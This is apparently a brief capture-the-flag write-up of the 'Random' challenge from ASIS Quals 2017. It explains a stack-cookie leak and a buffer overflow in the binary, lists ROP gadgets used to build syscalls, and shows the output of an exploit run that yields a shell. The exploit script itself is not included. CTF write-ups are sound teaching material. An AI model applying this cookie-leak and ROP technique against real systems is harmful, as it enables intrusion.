ASIS 2017 Quals Random

This is a write of the cahllenge Random from ASIS Quals 2017 CTF

The Challenge

Its a simple 64-bit binary which generates 'random' numbers, it has stack cookies.

Hand fuzzing

It was not necessary to reverse engineer the binary as it has odd and exploitable behaviour.

The binary behaves differently locally and remotely. Locally it returns only 0 when giving random numbers. Remotely is returns what looks like random numbers. After a short while of debugging I deduce that it is leaking the stack cookie. Also there is a buffer overflow when leaving a comment.

Exploitation

I found ROP gadgets using ROPGadget

$ ROPgadget --binary Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1
Gadgets information
============================================================
...
0x0000000000400f88 : mov rdx, rsi ; ret
...
0x0000000000400f8c : pop rax ; pop rdi ; ret
...
0x0000000000400f61 : pop rsi ; pop r15 ; ret
...
0x0000000000400f8f : syscall ; ret

These gadget are enough to make syscalls with 3 arguments, so I made an exploit:

Running it pops a shell:

$ python doit.py
[+] Starting local process './Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1': Done
[*] Stack cookie = 0x0000000000000000
[*] Switching to interactive mode
$ bash -l
$ cowsay "I got shell"
 _____________
< I got shell >
 -------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
$ ^C
[*] Interrupted
[*] Stopped program './Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1'